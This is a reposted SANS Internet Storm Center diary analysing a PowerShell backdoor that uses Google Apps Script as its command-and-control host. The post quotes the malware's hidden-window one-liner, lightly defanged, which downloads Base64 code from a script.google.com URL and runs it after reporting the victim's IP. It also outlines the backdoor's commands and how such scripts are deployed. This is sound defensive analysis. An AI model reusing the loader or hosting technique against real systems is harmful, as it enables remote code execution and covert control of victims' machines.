[SANS ISC] Malicious PowerShell Hosted on script.google.com, (Fri, May 28th)

Google has an incredible portfolio of services. Besides the classic ones, there are less known services and… they could be very useful for attackers too. One of them is Google Apps Script[1]. Google describes it like this:

“Apps Script is a rapid application development platform that makes it fast and easy to create business applications that integrate with G Suite.”

Just a quick introduction to this development platform to give you an idea about the capabilities. If, as the description says, it is used to extend the G Suite, it can of course perform basic actions like… hosting and delivering some (malicious) content.

First, let’s create an HTML file:

Then, edit “Code.gs” and create a doGet() function:

Save the project and you are ready to deploy it (it’s important to select the right access: Anyone):

Once the deployment successfully completed, you’ve now an URL that you can use to access your code:

That’s the technique used by the attackers in the sample that I found. The first stage was a simple PowerShell one-liner:

powershell.exe -nop -w hidden -c “Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString(‘hxxps://script[.]google[.]com/macros/s/AKfycbycf3i4YzhGtrLtW_ttACPfln3wLBM4jHtVsBheL6lAsPGt2D-nbTN_Y-NeUDYE50Y/exec?se=1&ip=’+(New-Object System.Net.WebClient).DownloadString(‘hxxp://api[.]ipify[.]org/’)))))”

You can see that the Google Script expects two parameters: ‘se’ and ‘ip’. The IP is the public IP address of the victim (collected by visiting api.ipify.org). When the script is called, it returns a chunk of Base64 data decoded and interpreted by PowerShell. It’s a simple backdoor that communicates with the C2 hosted on scripts.google.com. It supports the following commands:

cd
shell
powershell
upload
quit

I uploaded the script[2] if you are interested. If you don’t use Google Apps Script, any activity related to this FQDN could reveal some malicious activity!

[1] https://www.google.com/script/start/
[2] https://bazaar.abuse.ch/sample/cf8755956735075fe3a8e37d117500f459b2c8ce97dd759c5d3334223c84d582/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Source: Read More (SANS Internet Storm Center, InfoCON: green)

You might be interested in …

[ZDNet] More than 1 in 3 people have tried to guess someone else’s password: 3 in 4 succeed

All posts, ZDNet

According to a new study, one in 10 people believe someone could guess their password by looking through their social media. Source: Read More (Latest topics for ZDNet in Security)

Read More

[HackerNews] Microsoft’s Emergency Patch Fails to Fully Fix PrintNightmare RCE Vulnerability

All posts, HackerNews

Even as Microsoft expanded patches for the so-called PrintNightmare vulnerability for Windows 10 version 1607, Windows Server 2012, and Windows Server 2016, it has come to light that the patch for the remote code execution exploit in the Windows Print Spooler service can be bypassed in certain scenarios, effectively defeating the security protections and permitting attackers to […]

Read More

[SecurityWeek] Major Cyberattack on Poland Came from Russian Territory: Kaczynski

All posts, Security Week

A recent “large scale” cyberattack targeting top Polish politicians was launched from Russia, Jaroslaw Kaczynski, the leader of Poland’s governing right-wing party, said on Friday. read more Source: Read More (SecurityWeek RSS Feed)

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.